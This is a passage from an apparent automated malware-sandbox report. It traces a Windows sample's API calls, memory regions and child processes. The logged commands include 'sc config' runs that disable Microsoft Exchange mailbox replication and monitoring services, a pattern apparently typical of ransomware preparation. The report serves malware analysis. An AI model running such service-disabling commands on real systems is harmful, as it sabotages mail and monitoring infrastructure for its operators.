dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef69c | out: lpCommandLine="sc config MSExchangeMailboxReplication start= disabled", lpProcessInformation=0x1ef69c*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xfbc, dwThreadId=0xfcc)) returned 1 [0131.476] CloseHandle (hObject=0xa4) returned 1 [0131.476] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0131.476] GetEnvironmentStringsW () returned 0x44e9f28* [0131.476] FreeEnvironmentStringsA (penv="=") returned 1 [0131.476] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0131.521] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x1ef634 | out: lpExitCode=0x1ef634*=0x424) returned 1 [0131.521] CloseHandle (hObject=0xa8) returned 1 [0131.521] _vsnwprintf (in: _Buffer=0x1ef71c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef63c | out: _Buffer="00000424") returned 8 [0131.521] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000424") returned 1 [0131.521] GetEnvironmentStringsW () returned 0x44eb378* [0131.521] FreeEnvironmentStringsA (penv="=") returned 1 [0131.521] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0131.521] GetEnvironmentStringsW () returned 0x44eb378* [0131.521] FreeEnvironmentStringsA (penv="=") returned 1 [0131.521] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef6c8 | out: lpAttributeList=0x1ef6c8) [0131.521] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.521] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0131.522] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.522] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0131.522] _get_osfhandle (_FileHandle=0) returned 0x38 [0131.522] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0131.522] SetConsoleInputExeNameW () returned 0x1 [0131.522] GetConsoleOutputCP () returned 0x1b5 [0131.522] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0131.522] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.522] exit (_Code=1060) Thread: id = 492 os_tid = 0xfd4 Process: id = "144" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x745b7000" os_pid = "0xfe0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "143" os_parent_pid = "0xfdc" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7811 start_va = 0x7f55f000 end_va = 0x7f55ffff entry_point = 0x0 region_type = private name = "private_0x000000007f55f000" filename = "" Region: id = 7812 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7813 start_va = 0xb93e060000 end_va = 0xb93e07ffff entry_point = 0x0 region_type = private name = "private_0x000000b93e060000" filename = "" Region: id = 7814 start_va = 0xb93e080000 end_va = 0xb93e093fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b93e080000" filename = "" Region: id = 7815 start_va = 0xb93e0a0000 end_va = 0xb93e0dffff entry_point = 0x0 region_type = private name = "private_0x000000b93e0a0000" filename = "" Region: id = 7816 start_va = 0x7df5ff9c0000 end_va = 0x7ff5ff9bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff9c0000" filename = "" Region: id = 7817 start_va = 0x7ff6c3b60000 end_va = 0x7ff6c3b82fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3b60000" filename = "" Region: id = 7818 start_va = 0x7ff6c3b8d000 end_va = 0x7ff6c3b8dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3b8d000" filename = "" Region: id = 7819 start_va = 0x7ff6c3b8e000 end_va = 0x7ff6c3b8ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3b8e000" filename = "" Region: id = 7820 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 7821 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7822 start_va = 0xb93e060000 end_va = 0xb93e06ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b93e060000" filename = "" Region: id = 7823 start_va = 0xb93e070000 end_va = 0xb93e076fff entry_point = 0x0 region_type = private name = "private_0x000000b93e070000" filename = "" Region: id = 7824 start_va = 0xb93e0e0000 end_va = 0xb93e19dfff entry_point = 0xb93e0e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7825 start_va = 0xb93e1a0000 end_va = 0xb93e1dffff entry_point = 0x0 region_type = private name = "private_0x000000b93e1a0000" filename = "" Region: id = 7826 start_va = 0xb93e1e0000 end_va = 0xb93e1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b93e1e0000" filename = "" Region: id = 7827 start_va = 0xb93e1f0000 end_va = 0xb93e1f6fff entry_point = 0x0 region_type = private name = "private_0x000000b93e1f0000" filename = "" Region: id = 7828 start_va = 0xb93e200000 end_va = 0xb93e200fff entry_point = 0x0 region_type = private name = "private_0x000000b93e200000" filename = "" Region: id = 7829 start_va = 0xb93e210000 end_va = 0xb93e210fff entry_point = 0x0 region_type = private name = "private_0x000000b93e210000" filename = "" Region: id = 7830 start_va = 0xb93e260000 end_va = 0xb93e35ffff entry_point = 0x0 region_type = private name = "private_0x000000b93e260000" filename = "" Region: id = 7831 start_va = 0xb93e360000 end_va = 0xb93e4e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b93e360000" filename = "" Region: id = 7832 start_va = 0xb93e530000 end_va = 0xb93e53ffff entry_point = 0x0 region_type = private name = "private_0x000000b93e530000" filename = "" Region: id = 7833 start_va = 0xb93e540000 end_va = 0xb93e6c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b93e540000" filename = "" Region: id = 7834 start_va = 0xb93e6d0000 end_va = 0xb93facffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b93e6d0000" filename = "" Region: id = 7835 start_va = 0x7ff6c3a60000 end_va = 0x7ff6c3b5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3a60000" filename = "" Region: id = 7836 start_va = 0x7ff6c3b8b000 end_va = 0x7ff6c3b8cfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3b8b000" filename = "" Region: id = 7837 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 7838 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 7839 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7840 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7841 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 7842 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7843 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7844 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7845 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7846 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7847 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7848 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7849 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7850 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 489 os_tid = 0xfd0 Thread: id = 490 os_tid = 0xfd8 Thread: id = 491 os_tid = 0xfc0 Process: id = "145" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x27272000" os_pid = "0xfbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "143" os_parent_pid = "0xfdc" cmd_line = "sc config MSExchangeMailboxReplication start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7864 start_va = 0xbd0000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 7865 start_va = 0xbf0000 end_va = 0xbf1fff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 7866 start_va = 0xc00000 end_va = 0xc13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c00000" filename = "" Region: id = 7867 start_va = 0xc20000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c20000" filename = "" Region: id = 7868 start_va = 0xc60000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 7869 start_va = 0xca0000 end_va = 0xca3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ca0000" filename = "" Region: id = 7870 start_va = 0xcb0000 end_va = 0xcb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cb0000" filename = "" Region: id = 7871 start_va = 0xcc0000 end_va = 0xcc1fff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 7872 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 7873 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 7874 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7875 start_va = 0x7f840000 end_va = 0x7f862fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f840000" filename = "" Region: id = 7876 start_va = 0x7f869000 end_va = 0x7f869fff entry_point = 0x0 region_type = private name = "private_0x000000007f869000" filename = "" Region: id = 7877 start_va = 0x7f86c000 end_va = 0x7f86efff entry_point = 0x0 region_type = private name = "private_0x000000007f86c000" filename = "" Region: id = 7878 start_va = 0x7f86f000 end_va = 0x7f86ffff entry_point = 0x0 region_type = private name = "private_0x000000007f86f000" filename = "" Region: id = 7879 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7880 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7881 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 7882 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7883 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 7884 start_va = 0xd60000 end_va = 0xd6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d60000" filename = "" Region: id = 7885 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7886 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7887 start_va = 0x5040000 end_va = 0x513ffff entry_point = 0x0 region_type = private name = "private_0x0000000005040000" filename = "" Region: id = 7888 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7889 start_va = 0xbd0000 end_va = 0xbdffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 7890 start_va = 0xbe0000 end_va = 0xbe3fff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 7891 start_va = 0xcd0000 end_va = 0xd0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 7892 start_va = 0xd10000 end_va = 0xd4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 7893 start_va = 0xd70000 end_va = 0xe2dfff entry_point = 0xd70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7894 start_va = 0x4fb0000 end_va = 0x4fbffff entry_point = 0x0 region_type = private name = "private_0x0000000004fb0000" filename = "" Region: id = 7895 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 7896 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 7897 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 7898 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7899 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 7900 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7901 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7902 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 7903 start_va = 0x7f740000 end_va = 0x7f83ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f740000" filename = "" Region: id = 7904 start_va = 0x7f866000 end_va = 0x7f868fff entry_point = 0x0 region_type = private name = "private_0x000000007f866000" filename = "" Region: id = 7905 start_va = 0x4ea0000 end_va = 0x4f7efff entry_point = 0x4ea0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 7906 start_va = 0xe30000 end_va = 0xe41fff entry_point = 0xe30000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 493 os_tid = 0xfcc [0131.509] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0131.509] __set_app_type (_Type=0x1) [0131.509] __p__fmode () returned 0x77ac4d6c [0131.509] __p__commode () returned 0x77ac5b1c [0131.509] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0131.509] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0131.509] SetThreadUILanguage (LangId=0x0) returned 0x409 [0131.512] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0131.512] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0131.512] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0131.512] _wcsicmp (_String1="config", _String2="query") returned -14 [0131.512] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0131.512] _wcsicmp (_String1="config", _String2="start") returned -16 [0131.512] _wcsicmp (_String1="config", _String2="pause") returned -13 [0131.512] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0131.512] _wcsicmp (_String1="config", _String2="control") returned -14 [0131.512] _wcsicmp (_String1="config", _String2="continue") returned -14 [0131.512] _wcsicmp (_String1="config", _String2="stop") returned -16 [0131.512] _wcsicmp (_String1="config", _String2="config") returned 0 [0131.512] ResolveDelayLoadedAPI () returned 0x77262c10 [0131.512] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x5048580 [0131.514] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0131.514] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0131.514] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0131.514] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0131.514] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0131.514] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0131.514] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0131.514] OpenServiceW (hSCManager=0x5048580, lpServiceName="MSExchangeMailboxReplication", dwDesiredAccess=0x3) returned 0x0 [0131.514] GetLastError () returned 0x424 [0131.514] _ultow (in: _Dest=0x424, _Radix=13237428 | out: _Dest=0x424) returned="1060" [0131.514] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0131.516] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xc9fc90, nSize=0x2, Arguments=0xc9fca8 | out: lpBuffer="褐ԄﳐÉ蔔è") returned 0x62 [0131.516] GetFileType (hFile=0x3c) returned 0x2 [0131.516] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xc9fc74 | out: lpMode=0xc9fc74) returned 1 [0131.516] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x5048910*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xc9fc84, lpReserved=0x0 | out: lpBuffer=0x5048910*, lpNumberOfCharsWritten=0xc9fc84*=0x62) returned 1 [0131.517] LocalFree (hMem=0x5048910) returned 0x0 [0131.517] LocalFree (hMem=0x0) returned 0x0 [0131.517] CloseServiceHandle (hSCObject=0x5048580) returned 1 [0131.517] LocalFree (hMem=0x0) returned 0x0 [0131.517] exit (_Code=1060) Thread: id = 494 os_tid = 0xffc Process: id = "146" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x228e5000" os_pid = "0xfc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeMonitoring start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7907 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 7908 start_va = 0x770000 end_va = 0x476ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 7909 start_va = 0x4770000 end_va = 0x478ffff entry_point = 0x0 region_type = private name = "private_0x0000000004770000" filename = "" Region: id = 7910 start_va = 0x4790000 end_va = 0x4791fff entry_point = 0x0 region_type = private name = "private_0x0000000004790000" filename = "" Region: id = 7911 start_va = 0x47a0000 end_va = 0x47b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000047a0000" filename = "" Region: id = 7912 start_va = 0x47c0000 end_va = 0x47fffff entry_point = 0x0 region_type = private name = "private_0x00000000047c0000" filename = "" Region: id = 7913 start_va = 0x4800000 end_va = 0x48fffff entry_point = 0x0 region_type = private name = "private_0x0000000004800000" filename = "" Region: id = 7914 start_va = 0x4900000 end_va = 0x4903fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004900000" filename = "" Region: id = 7915 start_va = 0x4910000 end_va = 0x4910fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004910000" filename = "" Region: id = 7916 start_va = 0x4920000 end_va = 0x4921fff entry_point = 0x0 region_type = private name = "private_0x0000000004920000" filename = "" Region: id = 7917 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7918 start_va = 0x7edf0000 end_va = 0x7ee12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007edf0000" filename = "" Region: id = 7919 start_va = 0x7ee15000 end_va = 0x7ee15fff entry_point = 0x0 region_type = private name = "private_0x000000007ee15000" filename = "" Region: id = 7920 start_va = 0x7ee1c000 end_va = 0x7ee1efff entry_point = 0x0 region_type = private name = "private_0x000000007ee1c000" filename = "" Region: id = 7921 start_va = 0x7ee1f000 end_va = 0x7ee1ffff entry_point = 0x0 region_type = private name = "private_0x000000007ee1f000" filename = "" Region: id = 7922 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7923 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7924 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 7925 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7926 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 7927 start_va = 0x4930000 end_va = 0x493ffff entry_point = 0x0 region_type = private name = "private_0x0000000004930000" filename = "" Region: id = 7928 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7929 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7930 start_va = 0x4980000 end_va = 0x4a7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004980000" filename = "" Region: id = 7931 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7972 start_va = 0x4770000 end_va = 0x477ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004770000" filename = "" Region: id = 7973 start_va = 0x4940000 end_va = 0x497ffff entry_point = 0x0 region_type = private name = "private_0x0000000004940000" filename = "" Region: id = 7974 start_va = 0x4a80000 end_va = 0x4b3dfff entry_point = 0x4a80000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 